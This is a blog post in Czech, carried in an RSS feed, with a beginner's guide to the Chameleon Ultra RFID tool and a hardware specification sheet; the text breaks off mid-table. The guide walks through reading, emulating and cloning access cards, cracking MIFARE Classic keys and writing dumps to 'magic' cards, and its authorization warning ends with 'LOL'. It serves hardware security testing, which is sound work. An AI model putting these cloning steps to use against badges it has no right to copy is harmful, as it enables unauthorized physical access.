<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>mifare-classic - Hard Wired</title>
	<atom:link href="https://www.hardwired.dev/tag/mifare-classic/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.hardwired.dev</link>
	<description></description>
	<lastBuildDate>Tue, 20 Jan 2026 18:38:27 +0000</lastBuildDate>
	<language>cs</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>

<image>
	<url>https://www.hardwired.dev/wp-content/uploads/2022/10/android-chrome-256x256-1-150x150.png</url>
	<title>mifare-classic - Hard Wired</title>
	<link>https://www.hardwired.dev</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Chameleon Ultra: průvodce pro začátečníky</title>
		<link>https://www.hardwired.dev/2025/12/28/chameleon-ultra-pruvodce-pro-zacatecniky/</link>
		
		<dc:creator><![CDATA[Valentino Hesse OK2HSS]]></dc:creator>
		<pubDate>Sun, 28 Dec 2025 05:17:23 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Různé]]></category>
		<category><![CDATA[125 kHz]]></category>
		<category><![CDATA[13.56 MHz]]></category>
		<category><![CDATA[bezpečnostní testování]]></category>
		<category><![CDATA[Chameleon Ultra]]></category>
		<category><![CDATA[ChameleonUltraGUI]]></category>
		<category><![CDATA[emulace]]></category>
		<category><![CDATA[hardware hacking]]></category>
		<category><![CDATA[HF karty]]></category>
		<category><![CDATA[klonování karet]]></category>
		<category><![CDATA[LF karty]]></category>
		<category><![CDATA[mifare-classic]]></category>
		<category><![CDATA[MTools BLE]]></category>
		<category><![CDATA[návod pro začátečníky]]></category>
		<category><![CDATA[penetrační testování]]></category>
		<category><![CDATA[rfid]]></category>
		<category><![CDATA[RFID čtečka]]></category>
		<guid isPermaLink="false">https://www.hardwired.dev/?p=2918</guid>

					<description><![CDATA[<p>Chameleon Ultra: průvodce pro začátečníky Chameleon Ultra je kapesní RFID nástroj, který umí číst, emulovat, klonovat a testovat HF (13,56 &#62;&#62;&#62;</p>
<p>The post <a href="https://www.hardwired.dev/2025/12/28/chameleon-ultra-pruvodce-pro-zacatecniky/">Chameleon Ultra: průvodce pro začátečníky</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></description>
										<content:encoded><![CDATA[<div id="bsf_rt_marker"></div><h1>Chameleon Ultra: průvodce pro začátečníky</h1>
<p>Chameleon Ultra je kapesní RFID nástroj, který umí číst, emulovat, klonovat a testovat HF (13,56 MHz) i LF (125 kHz) karty. Tento článek tě provede od prvního zapnutí až po základní praktické scénáře, s důrazem na používání oficiálního ChameleonUltraGUI a MTools BLE.</p>
<hr />
<h2>Co Chameleon Ultra umí</h2>
<ul>
<li>Emulace: chová se jako RFID karta uložená ve slotu (bez nutnosti mít fyzickou kartu u sebe).  </li>
<li>Čtení a klonování: načte data z originální karty a uloží je buď do slotu, nebo do souboru/dumpu.  </li>
<li>„Cracking“ / útoky: podporuje běžné útoky na MIFARE Classic (mfkey32, Darkside, Nested, Hardnested) pro získání neznámých klíčů, pokud máš k tomu právní důvod a souhlas.  </li>
</ul>
<blockquote>
<p>Upozornění: používej zařízení jen na karty a systémy, ke kterým máš oprávnění – je to nástroj pro testování a vzdělávání, ne pro obcházení zabezpečení. LOL</p>
</blockquote>
<hr />
<h2>Základní hardware a ovládání</h2>
<p>Chameleon Ultra má vestavěnou baterii, jednu cívku pro HF, druhou pro LF (podle verze) a dvě tlačítka A/B. Přes USB-C se nabíjí a zároveň komunikuje s PC, přes BLE se připojuje k mobilu.</p>
<ul>
<li>Tlačítko A/B (krátký stisk): typicky přepínání slotů nebo rychlá akce (např. klonování UID).  </li>
<li>Tlačítko A/B (dlouhý stisk): druhá sada funkcí (např. krok zpět, speciální akce).  </li>
<li>LED: barva a animace indikují stav (nabíjení, DFU mód, aktivní slot, emulace apod.), dá se nakonfigurovat v GUI.  </li>
</ul>
<p>Konkrétní význam tlačítek si nastavíš v GUI v části „Settings of Interaction / Button config“.</p>
<hr />
<h2>Software: GUI, BLE a CLI</h2>
<p>Existují tři hlavní způsoby, jak Chameleon Ultra ovládat:</p>
<ul>
<li><strong>ChameleonUltraGUI</strong> (PC, Android, iOS): komunitní grafická aplikace, která umí správu slotů, čtení karet, emulaci, cracking, nastavení tlačítek a LED.  </li>
<li><strong>MTools BLE / MTools Lite</strong> (Android/iOS): mobilní appka s podporou BLE, vhodná na rychlé čtení/emulaci a práci s MIFARE Classic dumpy.  </li>
<li><strong>CLI</strong> (Python nástroj): příkazová řádka pro pokročilé, vhodná pro skriptování a automatizaci.  </li>
</ul>
<p>Pro začátečníka je nejpohodlnější začít s ChameleonUltraGUI nebo MTools BLE.</p>
<hr />
<h2>První spuštění a připojení</h2>
<ol>
<li><strong>Nabij zařízení</strong> – připoj USB-C k nabíječce/PC a nech baterii dobít.  </li>
<li><strong>Stáhni ChameleonUltraGUI</strong> – z oficiálních odkazů pro Windows/Linux/macOS nebo z App Store/Google Play pro mobil.  </li>
<li><strong>Připoj Chameleon</strong>
<ul>
<li>PC: přes USB-C, GUI by mělo zařízení automaticky detekovat.  </li>
<li>Mobil: zapni BLE (v nastavení zařízení) a v GUI/MTools vyhledej a připoj Chameleon Ultra.  </li>
</ul>
</li>
</ol>
<p>Jakmile je připojený, GUI zobrazí stav baterie, seznam slotů a základní informace o zařízení.</p>
<hr />
<h2>Sloty: virtuální „karty“ v zařízení</h2>
<p>Chameleon Ultra používá HF a LF sloty jako virtuální karty, které můžeš libovolně plnit daty.</p>
<ul>
<li>Typicky má 8 HF a 8 LF slotů, v GUI jsou zobrazeny v sekci „Slot Manager“ nebo podobně.  </li>
<li>Každý slot má: název, typ (MIFARE 1K, Ultralight, EM410X…), stav Enabled/Disabled a uložená data.  </li>
</ul>
<p>V GUI můžeš:</p>
<ul>
<li>Přepínat sloty.  </li>
<li>Přejmenovat je pro přehlednost.  </li>
<li>Zvolit typ tagu (HF/LF, MIFARE Classic, Ultralight, EM410X…).  </li>
<li>Zapnout/vypnout konkrétní slot pro emulaci (Enabled).  </li>
</ul>
<hr />
<h2>Čtení karty a uložení do slotu</h2>
<p>Základní workflow pro HF (např. MIFARE Classic):</p>
<ol>
<li>V GUI nebo MTools přejdi do části pro <strong>Reading / Reader / Read Card</strong>.  </li>
<li>Přilož originální kartu k cívce Chameleonu (co nejblíže).  </li>
<li>Zvol typ karty a použij funkci „Read“; pokud jsou klíče známé, načte se celý dump, jinak lze použít dostupné útoky k získání klíčů.  </li>
<li>Výsledek můžeš uložit jako „Saved Card“ nebo rovnou nahrát do vybraného slotu.  </li>
</ol>
<p>Pro LF (EM410X nebo T5577) je postup podobný, pouze zvolíš LF reader a odpovídající typ.</p>
<hr />
<h2>Emulace karty ze slotu</h2>
<p>Když máš slot připravený:</p>
<ol>
<li>V <strong>Slot Manageru</strong> vyber slot (např. HF Slot 1) a nastav ho jako Enabled.  </li>
<li>Zkontroluj v nastavení slotu, že se používají správné parametry (UID, SAK, ATQA nebo další identifikátory podle typu karty).  </li>
<li>Odpoj GUI nebo nech zařízení běžet samostatně – Chameleon bude emulovat aktuálně vybraný a povolený slot automaticky, jakmile ho přiblížíš k readeru.  </li>
</ol>
<p>Tlačítky A/B pak v terénu obvykle jen přepínáš sloty „Vpřed/Zpátky“ podle toho, jak sis je nadefinoval.</p>
<hr />
<h2>Nastavení tlačítek a standalone režim</h2>
<p>V GUI najdeš položku typu <strong>Settings / Settings of Interaction / Button config</strong>, kde přiřadíš akce krátkému a dlouhému stisku tlačítka A i B.</p>
<p>Typické nastavení pro standalone:</p>
<ul>
<li>Krátký stisk A: <strong>Vpřed</strong> (next slot).  </li>
<li>Krátký stisk B: <strong>Zpátky/Dozadu</strong> (previous slot).  </li>
<li>Dlouhý stisk A/B: například <strong>Klonovat UID</strong>, <strong>Deaktivovat</strong> nebo jinou dostupnou akci.  </li>
</ul>
<p>Emulace samotná není obvykle vázaná na tlačítko – probíhá automaticky podle aktivního slotu, jakmile je zařízení v poli čtečky.</p>
<hr />
<h2>Práce s MIFARE Classic dumpy a „magic“ kartami</h2>
<p>Častý pokročilejší scénář:</p>
<ul>
<li>MTools BLE a ChameleonUltraGUI umí pracovat s dumpy ve formátu MCT, BIN nebo JSON.  </li>
<li>Můžeš:
<ul>
<li>Načíst dump z karty a uložit ho do souboru.  </li>
<li>Nahrát dump do slotu a emulovat.  </li>
<li>Zapsat dump na „magic“ MIFARE Classic karty (Gen1A/Gen2/Gen3/Gen4) a fyzicky tak klonovat kartu.  </li>
</ul>
</li>
</ul>
<p>V emulačních nastaveních slotu lze zapnout režimy pro konkrétní generace „magic“ karet, aby se Chameleon choval kompatibilně.</p>
<hr />
<h2>CLI pro pokročilé uživatele</h2>
<p>Pokud ti GUI nestačí:</p>
<ul>
<li>Python CLI z repozitáře RfidResearchGroup umožňuje ovládat Chameleon přes příkazy jako <code>hw connect</code>, <code>hw slot</code>, <code>hw button</code>, <code>hf mf</code> a další.  </li>
<li>Hodí se pro skriptování, automatizované testy a integraci do vlastních nástrojů nebo pipeline.  </li>
</ul>
<p>Oficiální wiki má sekce <strong>quickstart</strong>, <strong>cli</strong> a <strong>troubleshooting</strong>, kde jsou příklady instalace a používání CLI.</p>
<hr />
<h2>Typické začátečnické scénáře</h2>
<ul>
<li>
<p><strong>Záložní emulace přístupového čipu</strong>  </p>
<ul>
<li>Načti originální kartu, ulož ji do slotu, slot povol a nastav tlačítka na přepínání slotů.  </li>
<li>V běžném provozu pak jen vybereš slot tlačítky a přiložíš Chameleon k readeru namísto karty.  </li>
</ul>
</li>
<li>
<p><strong>Základní analýza zabezpečení MIFARE Classic</strong>  </p>
<ul>
<li>Použij funkce pro čtení a cracking MIFARE Classic, získej klíče a prozkoumej, jak jsou data na kartě strukturovaná a jaké sektory jsou chráněné.  </li>
</ul>
</li>
</ul>
<hr />
<h1>Chameleon Ultra - Technické Specifikace</h1>
<p><strong>Verze dokumentu:</strong> 1.1 (Ověřeno k 28. prosinci 2024)<br />
<strong>Aktuální firmware:</strong> v2.1.0 (září 2024)<br />
<strong>Zdroje:</strong> GitHub RfidResearchGroup/ChameleonUltra, Lab401, oficiální dokumentace</p>
<h2>Základní Informace</h2>
<p>Chameleon Ultra je open-source RFID/NFC emulátor nové generace založený na čipu Nordic NRF52840. Zařízení kombinuje emulaci nízkofrekvenčních (LF) i vysokofrekvenčních (HF) tagů v kompaktním formátu klíčenky s výdrží baterie až 6 měsíců.</p>
<hr />
<h2>Hardware Specifikace</h2>
<h3>Procesor a Paměť</h3>
<table>
<thead>
<tr>
<th>Komponenta</th>
<th>Specifikace</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hlavní čip</td>
<td>Nordic NRF52840</td>
</tr>
<tr>
<td>Procesor</td>
<td>ARM Cortex-M4 32-bit</td>
</tr>
<tr>
<td>Frekvence CPU</td>
<td>64 MHz</td>
</tr>
<tr>
<td>Flash paměť</td>
<td>1 MB</td>
</tr>
<tr>
<td>RAM</td>
<td>256 KB</td>
</tr>
<tr>
<td>Dodatečný čip</td>
<td>MFRC522 (HF čtení/zápis)</td>
</tr>
<tr>
<td>SoftDevice</td>
<td>S140 (BLE stack)</td>
</tr>
</tbody>
</table>
<h3>Fyzické Parametry</h3>
<table>
<thead>
<tr>
<th>Parametr</th>
<th>Hodnota</th>
</tr>
</thead>
<tbody>
<tr>
<td>Rozměry</td>
<td>40 × 24 × 8 mm</td>
</tr>
<tr>
<td>Hmotnost</td>
<td>8 g</td>
</tr>
<tr>
<td>Materiál</td>
<td>Měď, epoxy, sklolaminát, nerez</td>
</tr>
<tr>
<td>Ovládací prvky</td>
<td>2× fyzická tlačítka (A, B)</td>
</tr>
<tr>
<td>LED indikátory</td>
<td>8× LED (slot indikace)</td>
</tr>
<tr>
<td>Konstrukce</td>
<td>2× PCB + plastový distanční prvek</td>
</tr>
</tbody>
</table>
<h3>Napájení a Konektivita</h3>
<table>
<thead>
<tr>
<th>Komponenta</th>
<th>Specifikace</th>
</tr>
</thead>
<tbody>
<tr>
<td>Baterie</td>
<td>LiPo 90 mAh</td>
</tr>
<tr>
<td>Výdrž baterie</td>
<td>až 6 měsíců (při 8× denně, 3s na použití)</td>
</tr>
<tr>
<td>Spotřeba - NFC aktivní</td>
<td>5 mA @ 3.3V</td>
</tr>
<tr>
<td>Spotřeba - šifrování</td>
<td>7 mA @ 3.3V</td>
</tr>
<tr>
<td>USB port</td>
<td>USB-C, USB 2.0</td>
</tr>
<tr>
<td>Bezdrátové připojení</td>
<td>Bluetooth BLE 5.0</td>
</tr>
<tr>
<td>Nabíjení</td>
<td>USB-C</td>
</tr>
</tbody>
</table>
<hr />
<h2>Podporované Frekvence a Protokoly</h2>
<h3>High Frequency (HF) - 13.56 MHz</h3>
<table>
<thead>
<tr>
<th>Kategorie</th>
<th>Podporované Tagy/Čipy</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Protokol</strong></td>
<td>ISO-14443A</td>
</tr>
<tr>
<td><strong>MIFARE Classic®</strong></td>
<td>1K, 2K, 4K (4-byte i 7-byte UID)</td>
</tr>
<tr>
<td><strong>MIFARE Ultralight®</strong></td>
<td>Standard, C, EV1</td>
</tr>
<tr>
<td><strong>NTAG®</strong></td>
<td>210, 211, 212, 213, 214, 215, 216, 218</td>
</tr>
<tr>
<td><strong>DESFire®</strong></td>
<td>EV1, EV2</td>
</tr>
<tr>
<td><strong>MIFARE Plus</strong></td>
<td>Podporováno</td>
</tr>
</tbody>
</table>
<p><strong>Poznámka:</strong> Pouze ISO14443A čipy jsou podporovány. Sniffing není podporován.</p>
<h3>Low Frequency (LF) - 125 kHz</h3>
<table>
<thead>
<tr>
<th>Modulace</th>
<th>Podporované Tagy</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>ASK</strong></td>
<td>EM410x, EM4100, EM4102</td>
</tr>
<tr>
<td><strong>PSK</strong></td>
<td>Indala, Keri, NexWatch</td>
</tr>
<tr>
<td><strong>FSK</strong></td>
<td>HID Prox, PAC/Stanley, Paradox</td>
</tr>
<tr>
<td><strong>Zapisovatelné</strong></td>
<td>T5577</td>
</tr>
</tbody>
</table>
<h4>Kompletní Seznam LF Tagů</h4>
<ul>
<li>EM410x / EM4100 / EM4102</li>
<li>T5577 (Read/Write)</li>
<li>HID Prox</li>
<li>Indala</li>
<li>PAC/Stanley</li>
<li>FDX-B</li>
<li>Paradox</li>
<li>Keri</li>
<li>AWD</li>
<li>ioProx</li>
<li>Presco</li>
<li>Viking</li>
<li>Noralsy</li>
<li>NexWatch</li>
<li>Jablotron</li>
<li>Gallagher</li>
</ul>
<p><strong>Poznámka:</strong> Podporovány jsou modulace ASK, PSK a FSK (téměř 99% 125kHz čipů).</p>
<hr />
<h2>Funkce a Možnosti</h2>
<h3>Emulace</h3>
<table>
<thead>
<tr>
<th>Funkce</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td>Počet slotů</td>
<td>8 slotů pro různé karty</td>
</tr>
<tr>
<td>Dual-frequency</td>
<td>Simultánní HF + LF emulace v jednom slotu</td>
</tr>
<tr>
<td>Frame Delay Time</td>
<td>Nejpřesnější emulace na trhu</td>
</tr>
<tr>
<td>Customizace</td>
<td>SAK, ATQA, ATS parametry</td>
</tr>
<tr>
<td>Režimy</td>
<td>Normal (perzistentní), Shadow (dočasné změny v RAM)</td>
</tr>
<tr>
<td>Optimalizace</td>
<td>Speciální optimalizace pro nízkopříkonové čtečky</td>
</tr>
</tbody>
</table>
<h3>Cracking (Lámání Klíčů) - MIFARE Classic®</h3>
<table>
<thead>
<tr>
<th>Metoda</th>
<th>Popis</th>
<th>Rychlost</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>MFKey32 v2</strong></td>
<td>Výpočet klíčů ze zachycených výměn</td>
<td>Rychlejší než Proxmark3</td>
</tr>
<tr>
<td><strong>Darkside</strong></td>
<td>Odvození klíčů bez známých klíčů</td>
<td>Podporováno</td>
</tr>
<tr>
<td><strong>Nested</strong></td>
<td>Odvození z jednoho známého klíče</td>
<td>Podporováno</td>
</tr>
<tr>
<td><strong>StaticNested</strong></td>
<td>Odvození ze statického PRNG</td>
<td>Podporováno</td>
</tr>
<tr>
<td><strong>Hardnested</strong></td>
<td>Pokročilý útok pro obtížné karty</td>
<td>Podporováno</td>
</tr>
</tbody>
</table>
<h3>Čtení a Zápis</h3>
<table>
<thead>
<tr>
<th>Funkce</th>
<th>HF (13.56 MHz)</th>
<th>LF (125 kHz)</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Čtení</strong></td>
<td>MIFARE Classic® (včetně dešifrování)</td>
<td>EM410x</td>
</tr>
<tr>
<td><strong>Zápis</strong></td>
<td>GEN1A, GEN2 magic cards, prázdné tagy</td>
<td>T5577</td>
</tr>
<tr>
<td><strong>Klonování</strong></td>
<td>Ano (včetně UID)</td>
<td>Ano (včetně UID)</td>
</tr>
<tr>
<td><strong>Standalone Copy</strong></td>
<td>Rychlá kopie UID tlačítkem</td>
<td>Rychlá kopie UID tlačítkem</td>
</tr>
</tbody>
</table>
<hr />
<h2>Software a Ovládání</h2>
<h3>Aktualizace Firmware</h3>
<table>
<thead>
<tr>
<th>Metoda</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>DFU přes USB</strong></td>
<td>Device Firmware Upgrade režim (hold B + plug USB)</td>
</tr>
<tr>
<td><strong>OTA</strong></td>
<td>Over-the-Air update přes Bluetooth</td>
</tr>
<tr>
<td><strong>Bootloader</strong></td>
<td>Read-only, minimální riziko bricknutí</td>
</tr>
<tr>
<td><strong>Factory Reset</strong></td>
<td><code>hw factory_reset --force</code> v CLI nebo GUI</td>
</tr>
<tr>
<td><strong>Firmware soubory</strong></td>
<td>ultra-dfu-app.zip (aplikace), ultra-dfu-full.zip (s bootloaderem)</td>
</tr>
</tbody>
</table>
<h3>Klientské Aplikace</h3>
<table>
<thead>
<tr>
<th>Platforma</th>
<th>Aplikace</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Windows/MacOS/Linux</strong></td>
<td>ChameleonUltraGUI</td>
<td>Oficiální GUI (Flutter), verze 1.1+ s Ultralight podporou</td>
</tr>
<tr>
<td><strong>Windows/MacOS/Linux</strong></td>
<td>CLI</td>
<td>Python-based command line, všechny funkce</td>
</tr>
<tr>
<td><strong>Android</strong></td>
<td>MTools BLE</td>
<td>Mobilní aplikace, podpora .nfc/.bin/.json/.mfd</td>
</tr>
<tr>
<td><strong>iOS</strong></td>
<td>MTools BLE</td>
<td>iOS verze mobilní aplikace</td>
</tr>
<tr>
<td><strong>Web</strong></td>
<td>chameleon-ultra.js</td>
<td>JavaScript SDK pro Web Bluetooth/Serial API</td>
</tr>
</tbody>
</table>
<h3>Komunikační Rozhraní</h3>
<table>
<thead>
<tr>
<th>Rozhraní</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>USB</strong></td>
<td>USB-C připojení, data + nabíjení, CLI/GUI/DFU</td>
</tr>
<tr>
<td><strong>Bluetooth</strong></td>
<td>BLE 5.0, bezdrátové ovládání, OTA updates</td>
</tr>
<tr>
<td><strong>CLI</strong></td>
<td>Command Line Interface, scripting, všechny funkce</td>
</tr>
<tr>
<td><strong>GUI</strong></td>
<td>Grafické rozhraní, user-friendly, většina funkcí</td>
</tr>
</tbody>
</table>
<hr />
<h2>Konstrukce a Hardwarové Detaily</h2>
<h3>Konstrukce Zařízení</h3>
<table>
<thead>
<tr>
<th>Komponenta</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Horní PCB</strong></td>
<td>Elektronika, HF anténa, LED indikátory</td>
</tr>
<tr>
<td><strong>Dolní PCB</strong></td>
<td>LF anténa, šrouby, logo</td>
</tr>
<tr>
<td><strong>Distanční prvek</strong></td>
<td>Plastový, obsahuje baterii a feritovou podložku</td>
</tr>
<tr>
<td><strong>Feritová podložka</strong></td>
<td>Umožňuje simultánní HF/LF emulaci</td>
</tr>
<tr>
<td><strong>Šrouby</strong></td>
<td>4× šrouby pro montáž</td>
</tr>
</tbody>
</table>
<h3>LED Indikace</h3>
<table>
<thead>
<tr>
<th>Barva</th>
<th>Význam</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Červená (R)</strong></td>
<td>Slot aktivní - HF + LF emulace současně</td>
</tr>
<tr>
<td><strong>Zelená (G)</strong></td>
<td>Aktivace HF polem</td>
</tr>
<tr>
<td><strong>Modrá (B)</strong></td>
<td>Aktivace LF polem</td>
</tr>
<tr>
<td><strong>Blikající</strong></td>
<td>Různé stavy (DFU, nabíjení, komunikace)</td>
</tr>
</tbody>
</table>
<h3>DevKit Verze</h3>
<table>
<thead>
<tr>
<th>Parametr</th>
<th>Hodnota</th>
</tr>
</thead>
<tbody>
<tr>
<td>Rozměry</td>
<td>5.3 × 8.5 × 1.1 cm</td>
</tr>
<tr>
<td>PCB tloušťka</td>
<td>1.6 mm</td>
</tr>
<tr>
<td>Speciální funkce</td>
<td>SWD port pro debugging</td>
</tr>
<tr>
<td>Design</td>
<td>Jeden PCB bez pouzdra</td>
</tr>
<tr>
<td>Výhody</td>
<td>Snadnější přístup pro vývoj, větší baterie</td>
</tr>
</tbody>
</table>
<hr />
<h2>Srovnání s Konkurencí</h2>
<h3>Výkonnostní Metriky</h3>
<table>
<thead>
<tr>
<th>Parametr</th>
<th>Chameleon Ultra</th>
<th>Flipper Zero</th>
<th>Proxmark3</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Frame Delay Time</strong></td>
<td>Nejpřesnější (optimalizováno)</td>
<td>Standardní</td>
<td>Velmi dobrá</td>
</tr>
<tr>
<td><strong>Emulace HF</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vynikající</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Dobrá</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vynikající</td>
</tr>
<tr>
<td><strong>Emulace LF</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vynikající</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Dobrá</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vynikající</td>
</tr>
<tr>
<td><strong>Cracking rychlost</strong></td>
<td>Srovnatelná/rychlejší</td>
<td>Ne</td>
<td>Referenční standard</td>
</tr>
<tr>
<td><strong>Velikost</strong></td>
<td>40×24×8 mm</td>
<td>Větší (85×40×18mm)</td>
<td>Mnohem větší</td>
</tr>
<tr>
<td><strong>Výdrž baterie</strong></td>
<td>6 měsíců</td>
<td>Dny-týdny</td>
<td>N/A (USB napájení)</td>
</tr>
<tr>
<td><strong>Standalone režim</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ne</td>
</tr>
<tr>
<td><strong>Bluetooth</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> BLE 5.0</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> BLE</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ne</td>
</tr>
<tr>
<td><strong>Čtení/zápis HF</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano (MFRC522)</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
</tr>
<tr>
<td><strong>Čtení/zápis LF</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Omezené</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Ano</td>
</tr>
</tbody>
</table>
<p><strong>Poznámka:</strong> Chameleon Ultra nabízí nejlepší poměr velikosti, výkonu a výdrže baterie pro emulaci a základní čtení/zápis. Proxmark3 zůstává referenčním nástrojem pro pokročilou analýzu a širší podporu protokolů.</p>
<hr />
<h2>Open Source</h2>
<table>
<thead>
<tr>
<th>Aspekt</th>
<th>Stav</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Licence</strong></td>
<td>GPL-3.0</td>
</tr>
<tr>
<td><strong>Hardware</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně open-source</td>
</tr>
<tr>
<td><strong>Firmware</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně open-source</td>
</tr>
<tr>
<td><strong>Software</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně open-source</td>
</tr>
<tr>
<td><strong>Schémata</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Dostupné na GitHub</td>
</tr>
<tr>
<td><strong>PCB návrhy</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Dostupné na GitHub</td>
</tr>
<tr>
<td><strong>Dokumentace</strong></td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Kompletní wiki</td>
</tr>
<tr>
<td><strong>GitHub</strong></td>
<td>RfidResearchGroup/ChameleonUltra</td>
</tr>
<tr>
<td><strong>Komunita</strong></td>
<td>Aktivní (iceman, doegox, GameTec-live)</td>
</tr>
</tbody>
</table>
<hr />
<h2>Obsah Balení</h2>
<h3>Standardní Verze</h3>
<table>
<thead>
<tr>
<th>Položka</th>
<th>Množství</th>
</tr>
</thead>
<tbody>
<tr>
<td>Chameleon Ultra zařízení</td>
<td>1×</td>
</tr>
<tr>
<td>Silikonové ochranné pouzdro</td>
<td>1×</td>
</tr>
<tr>
<td>USB-A na USB-C kabel</td>
<td>1×</td>
</tr>
<tr>
<td>Kroužek na klíče</td>
<td>1×</td>
</tr>
<tr>
<td>Záruka</td>
<td>2 roky (u některých prodejců)</td>
</tr>
</tbody>
</table>
<h3>DevKit Verze</h3>
<table>
<thead>
<tr>
<th>Položka</th>
<th>Množství</th>
</tr>
</thead>
<tbody>
<tr>
<td>Chameleon Ultra DevKit</td>
<td>1×</td>
</tr>
<tr>
<td>USB-A na USB-C kabel</td>
<td>1×</td>
</tr>
<tr>
<td>Záruka</td>
<td>2 roky</td>
</tr>
</tbody>
</table>
<hr />
<h2>Technické Výhody</h2>
<h3>Klíčové Inovace</h3>
<ol>
<li><strong>Objevení skryté RFID funkce</strong> v NRF52840 Bluetooth čipu</li>
<li><strong>Nejpřesnější Frame Delay Time</strong> na trhu</li>
<li><strong>Optimalizace pro nízkopříkonové čtečky</strong> (bateriové zámky)</li>
<li><strong>Simultánní HF/LF emulace</strong> v jednom slotu</li>
<li><strong>6měsíční výdrž baterie</strong> při běžném používání</li>
<li><strong>Rychlejší cracking než Proxmark3</strong></li>
</ol>
<h3>Nedávná Vylepšení (v2.0 - v2.1)</h3>
<table>
<thead>
<tr>
<th>Funkce</th>
<th>Popis</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Ultralight podpora</strong></td>
<td>Plná emulace MIFARE Ultralight (PR #215)</td>
</tr>
<tr>
<td><strong>BLE pairing</strong></td>
<td>Nové nastavení pro spárování Bluetooth</td>
</tr>
<tr>
